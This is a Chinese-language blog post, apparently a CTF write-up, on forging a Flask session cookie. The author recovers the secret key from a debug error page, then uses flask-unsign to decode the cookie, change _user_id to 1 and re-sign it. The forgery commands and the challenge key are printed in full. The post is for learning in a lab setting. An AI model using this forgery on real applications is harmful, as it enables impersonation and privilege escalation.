<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="两题忙两天，一题半小时，一题一天零24小时（犯蠢找到错的密钥）">
<meta property="og:type" content="article">
<meta property="og:title" content="基于flask的session伪造">
<meta property="og:url" content="http://example.com/2025/05/15/%E5%9F%BA%E4%BA%8Eflask%E7%9A%84session%E4%BC%AA%E9%80%A0/index.html">
<meta property="og:site_name" content="3a0-Eminem">
<meta property="og:description" content="两题忙两天，一题半小时，一题一天零24小时（犯蠢找到错的密钥）">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-05-15T01:49:18.000Z">
<meta property="article:modified_time" content="2025-05-16T16:30:00.318Z">
<meta property="article:author" content="3a0-Eminem">
<meta property="article:tag" content="散题">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2025/05/15/%E5%9F%BA%E4%BA%8Eflask%E7%9A%84session%E4%BC%AA%E9%80%A0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>基于flask的session伪造 | 3a0-Eminem</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">3a0-Eminem</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/05/15/%E5%9F%BA%E4%BA%8Eflask%E7%9A%84session%E4%BC%AA%E9%80%A0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="3a0-Eminem">
      <meta itemprop="description" content="No Human is Limited">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="3a0-Eminem">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          基于flask的session伪造
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2025-05-15 09:49:18" itemprop="dateCreated datePublished" datetime="2025-05-15T09:49:18+08:00">2025-05-15</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-05-17 00:30:00" itemprop="dateModified" datetime="2025-05-17T00:30:00+08:00">2025-05-17</time>
              </span>

          
            <div class="post-description">两题忙两天，一题半小时，一题一天零24小时（犯蠢找到错的密钥）</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="NSSRound-13-Basic-flask-jwt-hard"><a href="#NSSRound-13-Basic-flask-jwt-hard" class="headerlink" title="[NSSRound#13 Basic]flask?jwt?(hard)"></a>[NSSRound#13 Basic]flask?jwt?(hard)</h3><p>先讲难的那个，就是我搞了很久的那题<br>找拉蒙特徐，我说我明明找到了密钥，但是伪造的session还是通过不了，拉蒙特徐说:flask伪造session主要还是依靠密钥，只要有密钥就什么都不会错<br>他建议我去本地起一个flask用于调试密钥是否正确（这个我后续会去讲）<br>后面我发现真的是密钥错了（笑死了）</p>
<h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h4><p>我本来想去搞几题flask框架来打打，然后发现不是ssti就是什么杂七杂八的，我就选了两题cookie伪造来做，后面就认识到了这些内容</p>
<h4 id="查找密钥"><a href="#查找密钥" class="headerlink" title="查找密钥"></a>查找密钥</h4><p>由于拉蒙特徐让我去起flask，因此我学到了一些flask相关的知识，这题中用到的是flask的debug模式的知识<br>当flask开启debug（debug&#x3D;True），我输入不当内容页面会报错，这题的密钥就是通过报错找到的，现在&#x2F;wor目录下找到提示（一个时间），然后burp打一个错误的session进去，出现报错界面，我在这个界面中找了一个错误的密钥，因此一直做不出来，但是现在不要紧，因为我在这个界面中找到正确的密钥了<br>只要找到正确的密钥，然后用flask-unsign加密即可</p>
<h4 id="核心出装–flask-unsign"><a href="#核心出装–flask-unsign" class="headerlink" title="核心出装–flask-unsign"></a>核心出装–flask-unsign</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">flask-unsign -d -c <span class="string">&quot;.eJwljjGOAjEMRa8SuaawnTjO5AJbTUeP4mALim0GpkCIuzOrLd8v3n9vuMTmjxv057b7CS73K3RowSZLw1aplKFaWIqTGUUdmaYYGucyK2WipcXIWSwzorssFvVKhmNEZWYnNRNEQY_IKl69hBzeisfHQtMoTylN1XhOdm1StcERsj98-6_hA5_3X4f-hvQ3nG_7KZGkdbwSI0tC6qydWvpZz_D5fAGY0zl7.aCVC9g.7om0is_7m3lMe1lIrBmBVbRawGI&quot;</span></span><br><span class="line">&#123;<span class="string">&#x27;_fresh&#x27;</span>: True, <span class="string">&#x27;_id&#x27;</span>: <span class="string">&#x27;8f2b598086144a774254e1bb1f6a31c5b0b234c6131198fa335b3200ee59bf6d1b0aaf6222e17bb50050eff375e6e4f586160f2b91cb13c54877b2cc2e785678&#x27;</span>, <span class="string">&#x27;_user_id&#x27;</span>: <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;time&#x27;</span>: datetime.datetime(2025, 5, 15, 1, 27, 18, tzinfo=datetime.timezone.utc)&#125;</span><br></pre></td></tr></table></figure>
<p>得到的json结构就是解出来的cookie，结合我们之前找到的flask的密钥，再进行加密,把得到的新的session交上去，就可以得到flag了<br>把_user_id改成1</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">flask-unsign -s -S hardgam3_C0u1d_u_f1ndM3???? -c <span class="string">&quot;&#123;&#x27;_fresh&#x27;: True, &#x27;_id&#x27;: &#x27;8f2b598086144a774254e1bb1f6a31c5b0b234c6131198fa335b3200ee59bf6d1b0aaf6222e17bb50050eff375e6e4f586160f2b91cb13c54877b2cc2e785678&#x27;, &#x27;_user_id&#x27;: &#x27;1&#x27;, &#x27;time&#x27;: &#x27;datetime.datetime(2025, 5, 15, 1, 27, 18, tzinfo=datetime.timezone.utc)&#x27;&#125;&quot;</span></span><br><span class="line">.eJw9jk2KwzAMha8SvOpAKJJs2U6hZymWI9Es2kLqbFp693EYpqCf7y309N7uYqs-r-7U1k1Hd1lmd3LZSHjKkCOGUFIKxEFRBC0Wj5UFhHyoET3ilK14z-IJQJUnsTijQCkWiUgxiTAAg5r5xBo1GHffCP3HhFXQVw45JaFaSVPmmLLrQbanrn9psMu23LTjXJruePyHAwHxOPTCvceBUl95HNprudvj_D3Yx-tx1-PW6o_7_AKv1Ucd.aCVEOA.2DvC6wOeRNJO073nKbfeXNWUsGA</span><br></pre></td></tr></table></figure>
<p>这里注意一点，我们解出来的time的值是没有用单引号包裹的，但是我们重新加密时是用单引号包裹的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">第一处解密出来：<span class="string">&#x27;time&#x27;</span>: datetime.datetime(2025, 5, 15, 1, 27, 18, tzinfo=datetime.timezone.utc)</span><br><span class="line">第二处加密出来：<span class="string">&#x27;time&#x27;</span>: <span class="string">&#x27;datetime.datetime(2025, 5, 15, 1, 27, 18, tzinfo=datetime.timezone.utc)&#x27;</span></span><br></pre></td></tr></table></figure>
<p>理由是：当你用 flask-unsign -s 的 -c 参数来“伪造”一个 session dict 时，命令内部实际上是用 Python 的 ast.literal_eval（或者等价的安全字面量解析器）来把你传进来的字符串转换成一个 Python 对象。ast.literal_eval 只接受真正的字面量（字符串、数字、布尔值、列表、字典、元组等），不接受诸如函数调用或名称引用（比如 datetime.datetime(…)）——那会被当成不安全的表达式直接拒绝<br>如果写上者，就会有<br>ast.literal_eval 会报错，因为它不认识 datetime 这个名字，也不能执行函数调用。<br>如果写下者，就会有<br>literal_eval 就能把它解析成一个 Python 字符串 “datetime.datetime(…)” 而不是要你去调用 datetime.datetime。<br>总结一下：<br>加引号只是为了满足 flask-unsign（背后用的 ast.literal_eval）对“只允许字面量”的限制，否则它既不能识别也不会执行你那串 datetime.datetime(…)</p>
<p>网上关于这个的wp还是太少了<br>想了一想，第一题还是不写wp了，太麻烦</p>
<h4 id="后语"><a href="#后语" class="headerlink" title="后语"></a>后语</h4><p>认识到了挺多flask的内容(路由什么的都会了)，也学会了本地起一个简单的flask服务，这里我相当感谢拉蒙特徐了</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%95%A3%E9%A2%98/" rel="tag"># 散题</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2025/05/12/%E8%AE%B0%E4%B8%80%E6%AC%A1python%E5%A4%A7%E4%BD%9C%E4%B8%9A/" rel="prev" title="记一次python大作业">
      <i class="fa fa-chevron-left"></i> 记一次python大作业
    </a></div>
      <div class="post-nav-item">
    <a href="/2025/05/15/%E6%8E%A2%E5%A7%ACrce-labs-%E4%B8%80%E6%8A%8A%E8%BF%87/" rel="next" title="探姬rce-labs:一把过">
      探姬rce-labs:一把过 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#NSSRound-13-Basic-flask-jwt-hard"><span class="nav-number">1.</span> <span class="nav-text">[NSSRound#13 Basic]flask?jwt?(hard)</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%9F%A5%E6%89%BE%E5%AF%86%E9%92%A5"><span class="nav-number">1.2.</span> <span class="nav-text">查找密钥</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%A0%B8%E5%BF%83%E5%87%BA%E8%A3%85%E2%80%93flask-unsign"><span class="nav-number">1.3.</span> <span class="nav-text">核心出装–flask-unsign</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%90%8E%E8%AF%AD"><span class="nav-number">1.4.</span> <span class="nav-text">后语</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="3a0-Eminem"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">3a0-Eminem</p>
  <div class="site-description" itemprop="description">No Human is Limited</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">11</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:eminemgcxwlp@gmail.com" title="E-Mail → mailto:eminemgcxwlp@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2025\4\21 – 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">3a0-Eminem</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>


  















  

  

</body>
</html>
